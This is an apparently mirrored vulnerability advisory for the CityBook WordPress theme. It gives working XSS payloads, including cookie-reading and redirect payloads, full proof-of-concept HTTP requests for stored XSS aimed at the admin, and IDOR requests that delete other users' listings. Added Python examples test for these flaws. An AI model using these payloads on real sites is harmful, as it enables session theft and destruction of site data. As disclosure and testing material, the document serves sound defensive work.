CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities

CVE: CVE-2021-24201
Category: CWE-79
Price: Not specified
Severity: High
Author: Ravera
Risk: High
Exploitation Type: Remote
Date: 2019-12-27
CPE: cpe:/a:wordpress:citybook_directory_amp_listing_theme:2.2.2
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSS percentile: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120112

Below is a copy:

# Exploit Title: CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/citybook/
# Date: 27/12/2019
# Exploit Author: m0ze
# Vendor Homepage: https://cththemes.com/
# Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
# Version: 2.2.2
# Tested on: Parrot OS
# CWE: 79


----[]- Info: -[]----
Demo website: https://citybook2.cththemes.com/


----[]- Reflected XSS: -[]----
The homepage search input (placeholder "What are you looking for?") and the regular search box next to the site logo both submit their text as the search_term query parameter, which is reflected into the page without encoding. Prefix the payload with "> so it closes the attribute it lands in; the same value is written into three places in the page, so the payload fires three times.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D=

PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
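
A reflection probe for the search_term parameter, added here as an example; it is not part of the original advisory and not code from the theme. It sends an inert marker in place of the alert() payload through the same query string as the PoC URLs and, after parsing the response the way a browser would, counts how many times the marker became a real element (an injection point) versus how many times it survived only as text (correctly encoded). The two sample responses are constructed to mimic the three reflection points reported above; the real theme markup is not known here, and example.invalid is a placeholder host.

```python
"""Reflection probe for the search_term parameter (added example).

Builds the PoC query with an inert marker, then counts where the marker
lands after an HTML parse. Sample responses are constructed; the real
theme markup is not known.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode

PROBE_TAG = "zzprobe9"          # bogus element name no real page uses
MARKER = f'"><{PROBE_TAG}>'     # closes an attribute, then opens the tag


def build_probe_url(base_url, marker=MARKER):
    """Same parameters as the advisory's PoC URLs, payload replaced."""
    params = {
        "search_term": marker,
        "location_search": "",
        "nearby": "off",
        "address_lat": "",
        "address_lng": "",
        "distance": "10",
        "lcats[]": "",
    }
    return base_url.rstrip("/") + "/?" + urlencode(params)


class _ProbeSink(HTMLParser):
    """Counts where the marker ended up once the page is parsed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.injected = 0   # marker became a <zzprobe9> element: script would run
        self.inert = 0      # marker is only text or attribute data: encoded

    def handle_starttag(self, tag, attrs):
        if tag == PROBE_TAG:
            self.injected += 1
        for _, value in attrs:
            if value and PROBE_TAG in value:
                self.inert += 1

    def handle_data(self, data):
        if PROBE_TAG in data:
            self.inert += 1


def analyse_reflection(html_body):
    """Return {'injected': n, 'inert': m} for one response body."""
    sink = _ProbeSink()
    sink.feed(html_body)
    sink.close()
    return {"injected": sink.injected, "inert": sink.inert}


def probe_site(fetch, base_url):
    """fetch(url) -> body text; injected so the check also runs offline."""
    return analyse_reflection(fetch(build_probe_url(base_url)))


# Constructed response: search_term echoed raw into two value attributes
# and one heading, which is the "triggered three times" behaviour.
VULNERABLE_SAMPLE = f"""
<html><body class="home">
<form class="header-search"><input type="text" name="search_term"
  value="{MARKER}" placeholder="Search..."></form>
<form class="hero-search"><input type="text" name="search_term"
  value="{MARKER}" placeholder="What are you looking for?"></form>
<h2>Results for: {MARKER}</h2>
</body></html>
"""

# Same page after attribute/text encoding (esc_attr/esc_html in WordPress).
SAFE_SAMPLE = VULNERABLE_SAMPLE.replace(MARKER, escape(MARKER, quote=True))

if __name__ == "__main__":
    for label, body in (("raw", VULNERABLE_SAMPLE), ("encoded", SAFE_SAMPLE)):
        print(label, analyse_reflection(body))
```

Against a live site, pass a real fetch (for instance urllib.request.urlopen wrapped to return text) to probe_site; an injected count above zero is the bug, and after the fix every reflection should move to the inert column. The marker fires no script, so the probe is safe to run against production.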


----[]- Persistent XSS -> Chat: -[]----
Chat messages (sent from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom-right corner) are stored and rendered without encoding, so a message to any user, including the administrator, can carry a cookie-stealing payload to hijack that user's session, or force a redirect to a malicious website.

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: _your_auth_cookies_here_

action=citybook_addons_chat_reply&_nonce=x75ac6299d&cid=1020&user_id=XXX&touid=1&reply_text=_payload_

Where:
_nonce=x75ac6299d (the per-session WordPress nonce; take it from a legitimate chat request sent with your own session);
user_id=XXX (your own WordPress user ID);
touid=1 (the recipient's user ID; in this example ID 1 is the admin account);
reply_text=_payload_ (your payload, URL-encoded).


----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: Phone and Address. The payload is stored, but it only renders on the current user's own profile page (https://citybook2.cththemes.com/dashboard/?dashboard=profile), so this is self-XSS.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- Persistent XSS -> Listing page: -[]----
Add a new listing at https://citybook2.cththemes.com/submit/ (on first use you have to order the Free plan, then open this URL again).
Vulnerable input fields: Listing Address, Listing Latitude, Listing Longitude, Email Address and Description. Trainers section: the Add Member option's Name, Job or Position and Description fields. Additional Services Fees section: the Add Service option's Service Name field. The Listing Address value is also rendered unencoded in the admin dashboard, so a payload placed there can steal the administrator's cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=XXXX
Cookie: _your_auth_cookies_here_

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

XXXX
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>

-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"


-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"


-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"

<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"


-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"


-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"

<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"

<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"

<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"

<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

02b218f88a
-----------------------------18467633426500--
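
The chat and listing requests above both carry their payloads in an admin-ajax.php body. The field audit below is an added example, not code from the advisory or from the theme: it parses a captured body (form-urlencoded for citybook_addons_chat_reply, multipart/form-data for submit_listing), runs each value through an HTML parser and reports which fields carry markup and which carry something that executes (a script element or an on* event handler). It is the check to run over captured requests, or over values already stored in the database, when confirming a fix. The two sample bodies are constructed from the payloads quoted in this advisory; the listing sample keeps only a few of the original fields, and the user_id value 1234 in the chat sample is made up.

```python
"""Field audit for the stored-XSS request bodies (added example).

Parses a captured admin-ajax.php body, form-urlencoded for the chat reply
and multipart/form-data for submit_listing, then classifies every field
value by what a browser would make of it. Sample bodies are constructed
from the advisory's payloads; the real theme code is not involved.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote_plus

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class _MarkupScan(HTMLParser):
    """Counts elements, and elements that would execute script."""

    def __init__(self):
        super().__init__()
        self.tags = 0
        self.active = 0

    def handle_starttag(self, tag, attrs):
        self.tags += 1
        if tag in ACTIVE_TAGS or any(n.lower().startswith("on") for n, _ in attrs):
            self.active += 1


def classify(value):
    """'active' (runs script), 'markup' (renders elements) or 'plain'."""
    scan = _MarkupScan()
    scan.feed(value)
    scan.close()
    if scan.active:
        return "active"
    return "markup" if scan.tags else "plain"


def audit_fields(fields):
    """Group field names by classification, keeping submission order."""
    report = {"active": [], "markup": [], "plain": []}
    for name, value in fields.items():
        report[classify(value)].append(name)
    return report


def parse_urlencoded(body):
    """Flatten a form-urlencoded body to {name: value} (last value wins)."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_multipart(body, boundary):
    """Minimal multipart/form-data reader for text fields (no file parts)."""
    fields = {}
    for part in body.replace("\r\n", "\n").split("--" + boundary):
        part = part.strip("\n")
        if not part or part.startswith("--"):   # leading empty piece / terminator
            continue
        head, _, value = part.partition("\n\n")  # blank line separates headers
        name = re.search(r'name="([^"]+)"', head)
        if name:
            fields[name.group(1)] = value
    return fields


BOUNDARY = "---------------------------18467633426500"

# Constructed from the submit_listing PoC above (payloads are the advisory's).
SAMPLE_LISTING_BODY = f"""--{BOUNDARY}
Content-Disposition: form-data; name="title"

PoC
--{BOUNDARY}
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>

--{BOUNDARY}
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
--{BOUNDARY}
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
--{BOUNDARY}
Content-Disposition: form-data; name="contact_infos_phone"


--{BOUNDARY}
Content-Disposition: form-data; name="action"

submit_listing
--{BOUNDARY}--
"""

# Constructed from the chat PoC above; user_id 1234 is made up.
SAMPLE_CHAT_BODY = (
    "action=citybook_addons_chat_reply&_nonce=x75ac6299d&cid=1020"
    "&user_id=1234&touid=1&reply_text=" + quote_plus("<img src=x onerror=alert(`m0ze`)>")
)

if __name__ == "__main__":
    print("listing:", audit_fields(parse_multipart(SAMPLE_LISTING_BODY, BOUNDARY)))
    print("chat:", audit_fields(parse_urlencoded(SAMPLE_CHAT_BODY)))
```

Note that the comment-wrapped address payload still classifies as active: the parser consumes <!--<img src="--> as a comment and then sees a plain <img> with an onerror handler, which is exactly what the browser does. Fields that legitimately hold rich text (content) show up as markup and are expected; anything in the active column, or any markup in a field that should be plain text (address, coordinates, email, names), is the finding.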


----[]- IDOR #0: -[]----
Delete any post, page or listing, including ones the current user does not own:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&action=citybook_addons_delete_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (the WordPress post ID of the target page/post/listing; it can be read from the postid-N or page-id-N class on the <body> tag);
_nonce / _wpnonce (your own session's nonce, copied from a legitimate request made from the listings dashboard).


----[]- IDOR #1: -[]----
Remove the Featured option from any listing, including ones the current user does not own:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&lfeatured=true&action=citybook_addons_featured_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (the WordPress post ID of the target listing; it can be read from the postid-N or page-id-N class on the <body> tag);
_nonce / _wpnonce (your own session's nonce, copied from a legitimate request made from the listings dashboard).
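
Both IDORs come down to the same missing check: the handler acts on whatever lid it is given without confirming that the caller may modify that listing. The ownership check below is an added example, not code from the advisory or from the theme. It reads the listing ID from the postid-N / page-id-N class WordPress puts on <body>, as described above, builds the two request bodies in the same field order as the PoCs, and replays them through a caller-supplied POST function as a user who does not own the listing; a fixed handler (in WordPress terms, current_user_can('edit_post', $lid) for the featured toggle and current_user_can('delete_post', $lid) for deletion, after check_ajax_referer) must refuse both. Two stand-in servers are constructed so the check runs offline; their {"success": ...} JSON is the wp_send_json_success / wp_send_json_error shape, and whether the theme responds that way is an assumption.

```python
"""Ownership check for the two listing actions (added example).

Extracts the listing ID from the <body> class, builds the
citybook_addons_featured_listing and citybook_addons_delete_listing bodies
and replays them as a non-owner. The stand-in servers and their JSON
shape are constructed here; the theme's real responses are not known.
"""
import json
import re
from urllib.parse import parse_qsl, urlencode

BODY_CLASS = re.compile(r'<body\b[^>]*\bclass="([^"]*)"', re.I)
ID_CLASS = re.compile(r"\b(?:postid|page-id)-(\d+)\b")


def extract_post_id(page_html):
    """Listing/post ID from the <body> class list, or None if absent."""
    body = BODY_CLASS.search(page_html)
    if not body:
        return None
    found = ID_CLASS.search(body.group(1))
    return int(found.group(1)) if found else None


def listing_action_body(action, lid, nonce, **extra):
    """Form-urlencoded body in the same field order as the advisory's PoCs."""
    params = {"lid": str(lid), **extra, "action": action,
              "_nonce": nonce, "_wpnonce": nonce}
    return urlencode(params)


def action_accepted(response_text):
    """True when the handler reports success (assumed wp_send_json_* shape)."""
    try:
        return bool(json.loads(response_text).get("success"))
    except (ValueError, AttributeError):
        return False


def check_idor(post, lid, nonce):
    """post(body) -> response text, sent with the NON-owner's session cookies
    and that session's own nonce. Returns the actions the server accepted;
    an empty list means ownership is enforced. Use a throwaway listing: the
    delete probe is destructive, which is why it is sent last."""
    probes = [
        ("citybook_addons_featured_listing", {"lfeatured": "true"}),
        ("citybook_addons_delete_listing", {}),
    ]
    accepted = []
    for action, extra in probes:
        if action_accepted(post(listing_action_body(action, lid, nonce, **extra))):
            accepted.append(action)
    return accepted


def make_stand_in_server(enforce_ownership, owners, caller_id):
    """Constructed admin-ajax stand-in; owners maps lid -> owner user ID.
    With enforce_ownership=False it behaves like the vulnerable handler."""
    def post(body):
        params = dict(parse_qsl(body))
        lid = int(params["lid"])
        if enforce_ownership and owners.get(lid) != caller_id:
            return json.dumps({"success": False, "data": "not allowed"})
        return json.dumps({"success": True, "data": {"lid": lid}})
    return post


# Constructed listing page: the ID sits in the body class, as the advisory notes.
SAMPLE_LISTING_PAGE = (
    '<html><body class="listing-template-default single single-listing '
    'postid-4917 logged-in">...</body></html>'
)

if __name__ == "__main__":
    lid = extract_post_id(SAMPLE_LISTING_PAGE)
    owners = {lid: 1}                       # listing belongs to user 1
    for label, enforce in (("vulnerable", False), ("fixed", True)):
        server = make_stand_in_server(enforce, owners, caller_id=7)
        print(label, check_idor(server, lid, "xxb1891cee"))
```

Against a live site, post would wrap an HTTP client that sends the body to /wp-admin/admin-ajax.php with the second account's cookies; the nonce must belong to that same session, since WordPress nonces are tied to the user, so the test is specifically whether a valid nonce plus a foreign lid is enough. Run it with the owner's own session as well to confirm the fix did not break legitimate use.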
